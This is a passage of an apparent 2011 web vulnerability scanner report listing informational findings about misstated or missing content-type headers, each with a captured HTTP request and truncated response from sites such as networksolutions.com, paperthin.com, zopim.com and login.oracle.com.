Path:   /jsonLogRedVenturesId.do

Request

POST /jsonLogRedVenturesId.do HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Origin: http://www.networksolutions.com
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 53

default-method=logRVId&rvid=-1&rvphone=NONE&rvrf=NONE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:16 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sun, 27 Feb 2011 16:31:15 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:16 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}

17.69. http://www.paperthin.com/dhtmlmenu_pgdefs_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /dhtmlmenu_pgdefs_2.js

Request

GET /dhtmlmenu_pgdefs_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmb=259978379; __utmc=259978379; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:14:27 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Mon, 22 Nov 2004 20:20:10 GMT
ETag: "40000000118bd-3b0-3e97e954af280"
Accept-Ranges: bytes
Content-Length: 944
Content-Type: application/javascript

HM_PG_MenuWidth = 150;
HM_PG_BGColor = '#CCCCCC';
HM_PG_BGColorOver = '#eb8f35';
HM_PG_ItemPadding = 2;
HM_PG_BorderWidth = 1;
HM_PG_BorderColor = '#000000';
HM_PG_BorderStyle = 'solid';
HM_PG_Separat
...[SNIP]...

17.70. http://www.paperthin.com/dhtmlmenu_staticmenus_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /dhtmlmenu_staticmenus_2.js

Request

GET /dhtmlmenu_staticmenus_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmb=259978379; __utmc=259978379; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:14:27 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Fri, 25 Feb 2011 19:20:14 GMT
ETag: "40000000118be-d5f-49d203836faf8"
Accept-Ranges: bytes
Content-Length: 3423
Content-Type: application/javascript

paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a_TreesToBuild.length] = '6734'; param
...[SNIP]...

17.71. http://www.paperthin.com/products/dhtmlmenu_pgdefs_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /products/dhtmlmenu_pgdefs_2.js

Request

GET /products/dhtmlmenu_pgdefs_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.2.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:15:39 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Mon, 22 Nov 2004 20:31:20 GMT
ETag: "98000000013b4c-3b0-3e97ebd3a5600"
Accept-Ranges: bytes
Content-Length: 944
Content-Type: application/javascript

HM_PG_MenuWidth = 150;
HM_PG_BGColor = '#CCCCCC';
HM_PG_BGColorOver = '#eb8f35';
HM_PG_ItemPadding = 2;
HM_PG_BorderWidth = 1;
HM_PG_BorderColor = '#000000';
HM_PG_BorderStyle = 'solid';
HM_PG_Separat
...[SNIP]...

17.72. http://www.paperthin.com/products/dhtmlmenu_staticmenus_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /products/dhtmlmenu_staticmenus_2.js

Request

GET /products/dhtmlmenu_staticmenus_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.2.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:15:39 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Sat, 26 Feb 2011 22:21:35 GMT
ETag: "43000000013b56-d5f-49d36dea4900d"
Accept-Ranges: bytes
Content-Length: 3423
Content-Type: application/javascript

paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a_TreesToBuild.length] = '6734'; param
...[SNIP]...

17.73. http://www.paperthin.com/solutions/dhtmlmenu_pgdefs_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /solutions/dhtmlmenu_pgdefs_2.js

Request

GET /solutions/dhtmlmenu_pgdefs_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/solutions/index.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.1.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:15:28 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Wed, 24 Mar 2010 23:57:52 GMT
ETag: "80000000147b6-3b0-48294b2b7c000"
Accept-Ranges: bytes
Content-Length: 944
Content-Type: application/javascript

HM_PG_MenuWidth = 150;
HM_PG_BGColor = '#CCCCCC';
HM_PG_BGColorOver = '#eb8f35';
HM_PG_ItemPadding = 2;
HM_PG_BorderWidth = 1;
HM_PG_BorderColor = '#000000';
HM_PG_BorderStyle = 'solid';
HM_PG_Separat
...[SNIP]...

17.74. http://www.paperthin.com/solutions/dhtmlmenu_staticmenus_2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /solutions/dhtmlmenu_staticmenus_2.js

Request

GET /solutions/dhtmlmenu_staticmenus_2.js HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/solutions/index.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.1.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:15:28 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Last-Modified: Sat, 26 Feb 2011 13:30:03 GMT
ETag: "80000000147b7-d5f-49d2f71b1ee37"
Accept-Ranges: bytes
Content-Length: 3423
Content-Type: application/javascript

paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a_TreesToBuild.length] = '6734'; param
...[SNIP]...

17.75. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Request

GET /hostedbadge.php?s=2 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 27 Feb 2011 16:31:16 GMT
X-Varnish: 1507552913
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 365


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/2\/?url=http:\/\/www.bloganol.com\/2011\/02\/domain-short-url-google-apps.html\" scrolling=\"no\" f
...[SNIP]...

17.76. http://www.winamp.com/modules/getTweets.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winamp.com
Path:   /modules/getTweets.jsp

Request

GET /modules/getTweets.jsp HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/art/winamp/winamp-twitter.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=US; s_pers=%20s_getnr%3D1298828702559-New%7C1361900702559%3B%20s_nrgvo%3DNew%7C1361900702562%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=UTF-8
ntCoent-Length: 449
Content-Length: 449

<!-- Sat Feb 26 02:40:05 EST 2011 - Unable to transform "Winamp-Tweets Default" using Content Type Winamp-Tweets (http://twitter.com/statuses/user_timeline/winamp.xml) for Page Type: Twitter -> View:
...[SNIP]...

17.77. http://www4d.wolframalpha.com/input/recalculate.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www4d.wolframalpha.com
Path:   /input/recalculate.jsp

Request

GET /input/recalculate.jsp?id=MSP485219ecg7ic1a16ifci000018bb0i6df47737i6&asynchronous=pod&s=23&fp=1&i=labor%20day HTTP/1.1
Host: www4d.wolframalpha.com
Proxy-Connection: keep-alive
Referer: http://www.wolframalpha.com/input/?i=labor%20day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WR_SID=173.193.214.243.1298944660480512

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:59:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2078
Set-Cookie: JSESSIONID=C056B7EDBB6074639292A6C7AD478375; Path=/


function showSideAndFoot(){
   if (typeof rFader == "undefined"){
    $(".hide-rcld").removeClass("hide-rcld");
    $(".hide-sidebar").removeClass("hide-sidebar");
   } else {
    rFader.sidebarFadeIn();
   
...[SNIP]...

17.78. http://xss.cx/spark.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://xss.cx
Path:   /spark.css

Request

GET /spark.css HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Referer: http://xss.cx/report.aspx
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=818-1298821388382; ASP.NET_SessionId=mr0ekreoyf3zfn45n0niyu45

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/css
Last-Modified: Sun, 09 Jan 2011 18:21:47 GMT
Accept-Ranges: bytes
ETag: "609ed7132ab0cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Sun, 27 Feb 2011 19:31:13 GMT
Content-Length: 5238

   <style type="text/css">
       body
       {
           margin: 30px;
       }
       p, div, td, h2, h2, h3
       {
           font-family: Verdana, Arial, sans-serif;
           font-size: 12px;
       }
       .board
       {
           background-color:
...[SNIP]...

18. Content type is not specified  previous
There are 11 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.



18.1. https://accounts.zoho.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
ETag: W/"29926-1296552470000"
Last-Modified: Tue, 01 Feb 2011 09:27:50 GMT
Content-Length: 29926
Date: Tue, 01 Mar 2011 02:56:55 GMT
Server: ZWS

......00......h....... ...........................
..........(.......00..........&.. ..........................v$..........h...>+..00.... ..%...0.. .... .....NV........ ..    ...f........ .h...~p..(.
...[SNIP]...

18.2. http://charts.aastocks.com/servlet/Charts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://charts.aastocks.com
Path:   /servlet/Charts

Request

GET /servlet/Charts?scheme=1&com=100&chartwidth=220&chartheight=150&stockid=268.HK&period=7&type=5&fontsize=12&vol=0&titlestyle=3&lang=3 HTTP/1.1
Host: charts.aastocks.com
Proxy-Connection: keep-alive
Referer: http://www.kingdee.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 28 Feb 2011 17:50:10 GMT
Content-Length: 3034

GIF89a...................7w..a.............,t..R..X..............j..T..S..O..............[..U.Z..W..G..........w...X.4u...._...M.k........[...R..f.u...........&m.E.....~...S.n..............+i.7{.....
...[SNIP]...

18.3. http://init.zopim.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://init.zopim.com
Path:   /register

Request

POST /register HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 714

swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 20:41:45 GMT
Connection: keep-alive
Content-Length: 809

{"status": "offline", "__status": "ok", "name": "Visitor 210779445", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment
...[SNIP]...

18.4. http://lc03.zopim.com/poll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lc03.zopim.com
Path:   /poll

Request

POST /poll HTTP/1.1
Host: lc03.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 86

sid=hqMuRcPj4fidDQi6A0Xx9cBWBT8keGlWa1b2NYEA&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&evt=0

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 22:23:46 GMT
Connection: keep-alive
Content-Length: 39

{"__status":"ok", "evt":0, "events":[]}

18.5. http://lc03.zopim.com/send  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lc03.zopim.com
Path:   /send

Request

POST /send HTTP/1.1
Host: lc03.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 141

msg=%5B%7B%22sid%22%3A%22hqMuRcPj4fidDQi6A0Xx9cBWBT8keGlWa1b2NYEA%22%2C%22%5F%5FmessageID%22%3A1834%2C%22%5F%5Ftype%22%3A%22reattach%22%7D%5D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 22:22:15 GMT
Connection: keep-alive
Content-Length: 73

[{"__status": "ok", "__type": "response", "__messageID": 1834, "evt": 0}]

18.6. http://lfov.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
ETag: W/"1406-1239369371000"
Last-Modified: Fri, 10 Apr 2009 13:16:11 GMT
Content-Length: 1406
Date: Sat, 26 Feb 2011 23:31:40 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

..............h.......(....... ....................................I..=l!.}H).~1{..us...u...o...q.............##...U...Z..CC.........A...K...m...v.....................................................
...[SNIP]...

18.7. http://lfov.net/webrecorder/g/chimera.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=cd5c1df0-027f-4e40-b88b-91ea6f442021; Expires=Sun, 26-Feb-2012 23:19:50 GMT
Content-Length: 51
Date: Sat, 26 Feb 2011 23:19:50 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='cd5c1df0-027f-4e40-b88b-91ea6f442021';


18.8. http://lfov.net/webrecorder/js/listen.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Sun, 13 Feb 2011 03:48:47 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Sat, 5 Mar 2011 18:17:37 GMT
Date: Sat, 26 Feb 2011 23:17:37 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...

18.9. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
